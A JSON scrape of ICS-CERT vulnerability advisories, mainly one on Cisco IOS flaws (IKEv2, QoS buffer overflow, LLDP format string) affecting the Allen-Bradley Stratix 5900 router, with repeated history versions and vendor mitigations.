guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02>); we'd welcome your feedback.\n", "published": "2018-12-18T00:00:00", "modified": "2018-12-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://www.us-cert.gov/ics/advisories/ICSA-18-352-02", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-352-02", "https://cwe.mitre.org/data/definitions/20.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-352-02", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2018-18999"], "immutableFields": [], "lastseen": "2021-02-27T19:50:55", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}], "modified": "2021-02-27T19:50:55", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-02-27T19:50:55", "rev": 2}}, "objectVersion": "1.5"}, "lastseen": "2021-02-27T19:50:55", "differentElements": ["cvss2", "cvss3"], "edition": 7}], "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18999"]}, {"type": "nessus", "idList": ["SCADA_ADVANTECH_WEBACCESS_CVE-2018-18999.NBIN"]}], "modified": "2021-07-28T18:31:31", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-07-28T18:31:31", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.ics.ICSBulletin", "_object_types": ["robots.models.ics.ICSBulletin", "robots.models.base.Bulletin"]}, {"id": "ICSA-18-107-03", "hash": "fc8bc851e7497c6800e3d3bf2ff3ca753d91e515de2b1179ef76f8a38ec19e32", "type": "ics", "bulletinFamily": "info", "title": "Rockwell Automation Stratix Services Router", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03>); we'd welcome your feedback.\n", "published": "2018-04-17T00:00:00", "modified": "2018-04-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.us-cert.gov/ics/advisories/ICSA-18-107-03", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/20.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://cwe.mitre.org/data/definitions/134.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "https://www.dhs.gov/privacy-policy", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03", "http://twitter.com/icscert", "https://www.dhs.gov", "https://www.dhs.gov/freedom-information-act-foia", "https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plain-writing-dhs", "https://www.dhs.gov/plug-information", "https://www.oig.dhs.gov/", "https://www.whitehouse.gov/", "https://www.usa.gov/", "https://www.dhs.gov/"], "cvelist": ["CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167", "CVE-2018-0175"], "lastseen": "2021-02-27T19:51:41", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.4 [USE OF EXTERNALLY-CONTROLLED FORMAT STRING CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)\n\nA format string vulnerability in the LLDP subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0175](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **Critical Infrastructure Sectors:** Critical Manufacturing, Energy, Water and Wastewater Systems\n * **Countries/Areas Deployed: **Worldwide\n * **Company Headquarters Location: **Wisconsin, USA\n\n### 3.4 RESEARCHER\n\nRockwell Automation reported these vulnerabilities to NCCIC from the semi-annual Cisco IOS and IOS XE Software Security Advisory Bundled Publication.\n\n## 4\\. MITIGATIONS\n\nRockwell Automation has released knowledge base article 1073313 which can be found at the following location:\n\n<https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/> (login required)\n\nCisco has released Snort Rules 46110 and 46111 to help address CVE-2018-0158 and CVE-2018-0151. See new rules at:\n\n<https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html>\n\nCVE-2018-0151: Users who do not use the Adaptive QoS for DMVPN feature can deny all traffic destined to UDP port 18999 on an affected device by using a Control Plane Policing (CoPP) policy. If the Adaptive QoS for DMVPN feature is later configured, the device must be upgraded to an unaffected release of Cisco IOS Software or Cisco IOS XE Software and the CoPP policy must be removed.\n\nCVE-2018-0167 and CVE-2018-0175 have no specific mitigations in place. See the following Cisco Vulnerability advisory for more details:\n\n<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp>\n\nRockwell Automation also recommends that users implement the following general security guidelines:\n\n * Help minimize network exposure for all control system devices and/or systems, and confirm that they are not accessible from the Internet.\n * Locate control system networks and devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS-CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\nWas this document helpful? Yes | Somewhat | No\n", "enchantments": {"dependencies": {"modified": "2020-10-28T01:18:34", "references": [{"idList": ["ICSA-18-107-05", "ICSA-18-107-04"], "type": "ics"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["CISCO-SA-20180328-LLDP", "CISCO-SA-20180328-IKE", "CISCO-SA-20180328-QOS"], "type": "cisco"}, {"idList": ["CISCO-SA-20180328-LLDP-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOSXE.NASL", "CISCO-SA-20180328-LLDP-IOS.NASL", "CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-LLDP-IOSXR.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL", "CISCO-SA-20180328-IKE-IOS.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-10-28T01:18:34", "rev": 2, "value": 8.1, "vector": "NONE"}}, "hash": "7466399bdd17ed80e0cd4da02b43b8ac908ab4d93b9bf0054bd325ac0459afe4", "history": [], "href": "https://www.us-cert.gov//ics/advisories/ICSA-18-107-03", "id": "ICSA-18-107-03", "lastseen": "2020-10-28T01:18:34", "modified": "2018-04-25T00:00:00", "objectVersion": "1.4", "published": "2018-04-17T00:00:00", "references": ["https://www.dhs.gov/homeland-security-no-fear-act-reporting", "https://www.dhs.gov/plug-information", "https://www.dhs.gov/privacy-policy", "https://www.whitehouse.gov/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/20.html", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "https://www.dhs.gov/plain-writing-dhs", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "/forms/feedback?helpful=yes&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0175", "https://www.oig.dhs.gov/", "https://twitter.com/share?url=https%3A%2F%2Fus-cert.cisa.gov%2Fics%2Fadvisories%2FICSA-18-107-03", "https://cwe.mitre.org/data/definitions/134.html", "https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html", "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1073313/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167", "https://www.dhs.gov/freedom-information-act-foia", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-lldp", "http://twitter.com/icscert", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov", "https://www.usa.gov/", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "https://www.dhs.gov/", "/forms/feedback?helpful=no&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "/forms/feedback?helpful=somewhat&document=ICSA-18-107-03: Rockwell Automation Stratix Services Router&trackingNumber=&url=https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-03&site_name=US-CERT", "https://cwe.mitre.org/data/definitions/119.html", "https://cwe.mitre.org/data/definitions/119.html", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151"], "reporter": "Industrial Control Systems Cyber Emergency Response Team", "title": "Rockwell Automation Stratix Services Router", "type": "ics", "viewCount": 7}, "differentElements": ["references", "description"], "edition": 4, "lastseen": "2020-10-28T01:18:34"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2018-0175", "CVE-2018-0151", "CVE-2018-0158", "CVE-2018-0167"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION**: Exploitable remotely/low skill level to exploit.\n * **Vendor**: Rockwell Automation\n * **Equipment**: Allen-Bradley Stratix 5900 Services Router\n * **Vulnerabilities**: Improper Input Validation, Improper Restriction of Operations within the Bounds of a Memory Buffer, Use of Externally-Controlled Format String.\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Allen-Bradley Stratix Services Router use a vulnerable version of Cisco IOS or IOS XE:\n\n * Allen-Bradley Stratix 5900 Services Router, version 15.6.3M1 and earlier.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nA vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a memory leak or a reload of an affected device that leads to a denial of service (DoS) condition.\n\nThe vulnerability is due to incorrect processing of certain IKEv2 packets. An attacker could exploit this vulnerability by sending crafted IKEv2 packets to an affected device to be processed. A successful exploit could cause an affected device to continuously consume memory and eventually reload, resulting in a DoS condition.\n\n[CVE-2018-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0158>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H>)).\n\n### 3.2.2 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated remote attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\n[CVE-2018-0151](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0151>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.2.3 [IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER CWE-119](<https://cwe.mitre.org/data/definitions/119.html>)\n\nA buffer overflow vulnerability in the LLDP subsystem of Cisco IOS Software, Cisco IOS XE Software, and Cisco IOS XR Software could allow an adjacent, unauthenticated attacker to cause a DoS condition or execute arbitrary code with elevated privileges.\n\n[CVE-2018-0167](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0167>) has been assigned to this vulnerability. A CVSS v3 base score of 8.8 has been calculated; the CVSS vector string is 